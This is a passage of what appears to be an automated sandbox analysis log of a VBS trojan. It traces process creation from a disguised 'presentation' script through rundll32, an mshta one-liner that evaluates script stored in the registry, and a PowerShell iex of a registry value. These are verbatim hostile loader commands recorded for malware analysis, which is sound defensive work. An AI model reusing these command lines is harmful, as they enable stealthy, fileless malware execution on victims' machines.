                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory,32_2_00CCF029
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CCF36B NtProtectVirtualMemory,32_2_00CCF36B
                    Source: tjafqng0.dll.27.drStatic PE information: No import functions for PE file found
                    Source: qlsida3o.dll.29.drStatic PE information: No import functions for PE file found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210913Jump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winVBS@22/20@6/1
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe<